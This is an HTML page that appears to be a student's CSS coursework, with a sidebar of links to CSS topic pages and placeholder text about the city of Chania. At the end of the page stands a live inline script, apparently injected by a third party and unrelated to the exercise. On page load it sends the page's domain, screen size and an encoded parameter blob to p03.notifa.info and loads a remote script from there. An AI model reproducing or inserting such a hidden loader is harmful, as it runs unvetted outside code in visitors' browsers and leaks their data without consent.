<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="css/style2.css">
</head>
<body>

<div class="header">
  <h1>Johanes C T - 17102059 - S1IF05B</h1>
</div>

<div class="row">
  <div class="col-3 col-s-3 menu">
    <ul>
      <li><a href="inline_style.html" />Inline Style</a></li>
      <li><a href="embedded_style.html" />Embedded Style</a></li>
      <li><a href="external_style.html" />External Style</a></li>
      <li><a href="CSS_Rounded_Corners.html" />CSS Rounded Corners</a></li>
      <li><a href="CSS_Border_Images.html" />CSS Border Images</a></li>
      <li><a href="CSS_Multiple_Backgrounds.html" />CSS Backgrounds</a></li>
      <li><a href="CSS_Colors.html" />CSS Colors</a></li>
      <li><a href="CSS_Gradients.html" />CSS Gradients</a></li>
      <li><a href="CSS_Shadow_Effects.html" />CSS Shadows</a></li>
      <li><a href="CSS_Text_Effects.html" />CSS Text Effects</a></li>
      <li><a href="CSS_Web_Fonts.html" />CSS Web Fonts</a></li>
      <li><a href="CSS_2D_Transforms.html" />CSS 2D Transforms</a></li>
      <li><a href="CSS_3D_Transforms.html" />CSS 3D Transforms</a></li>
      <li><a href="CSS_Transitions.html" />CSS Transitions</a></li>
      <li><a href="CSS_Animations.html" />CSS Animations</a></li>
      <li><a href="CSS_Tooltip.html" />CSS Tooltip</a></li>
      <li><a href="CSS_Styling_Images.html" />CSS Styling Images</a></li>
      <li><a href="CSS_The_object-fit_Property.html" />CSS The object-fit Property</a></li>
      <li><a href="CSS_Buttons.html" />CSS Button</a></li>
      <li><a href="CSS_Pagination_Examples.html" />CSS Pagination</a></li>
      <li><a href="CSS_Multiple_Columns.html" />CSS Multiple Columns</a></li>
      <li><a href="CSS_User_Interface.html" />CSS User Interface</a></li>
      <li><a href="CSS_Variables.html" />CSS Variables</a></li>
      <li><a href="CSS_Box_Sizing.html" />CSS Box Sizing</a></li>
      <li><a href="CSS_Flexbox.html" />CSS Flexbox</a></li>
      <li><a href="CSS_Media_Queries.html" />CSS Media Queries</a></li>
      <li><a href="CSS_Media_Queries_-_Examples.html" />CSS MQ Examples</a></li>
    </ul>
  </div>

  <div class="col-6 col-s-9">
    <h1>Tugas Pertemuan 3</h1>
    <p>Chania is the capital of the Chania region on the island of Crete. The city can be divided in two parts, the old town and the modern city.</p>
  </div>

  <div class="col-3 col-s-12">
    <div class="aside">
      <h2>Tentang Saya</h2>
      <p>Chania is a city on the island of Crete.</p>
    </div>
  </div>
</div>

<div class="footer">
  <p>Resize the browser window to see how the content respond to the resizing.</p>
</div>

<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p03.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncXUOMYl3dEcejclt0snLgtQbihtnAp1Qhrrni0ZcS00XefSRgDYlSu%2f4H2h4wYhkR1TVCQJGQq%2fPmIJkzT1kR5PNtTUZipr1z%2bgvUlfQswm8lD0OHFuU%2fccLyOBUhQPh3XWslTZIi%2fv5uXln1K3qx7NGC5VugFFFXzdT8%2bAGX1pfqLfcQTqqwjRl%2blnK38kfINQuM8m2B0MRvUu3ovTN8JIStud1vc8AE4rV3YrXydWziVy6AIUdDSQAZD0OFPTNHfa11uq2hxLWw0bbTImz31cYQ2CLeMJktZDxp3ki091%2baWCYtuYF7SKoYWOQAaizj0n6zCuw4HYPIZB0l7bSg6mPl6EvOAEd8kJHt4mr%2bQ5jhIWeNep5qgvugtRBl%2b9cXSQgsokta5iVl7B6msl1IxUNadkUhsLGQkITCurRKa%2b9aHf7dvPIE9jd0kSoA%2f0E2wh2plvC6x9UGWQGE8hUKJxQoM5pNRvblHHZ9eUJDE5KGZKSO6D7LoA%2fEl4imu%2bdiJrl4r2vlE%2biE%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>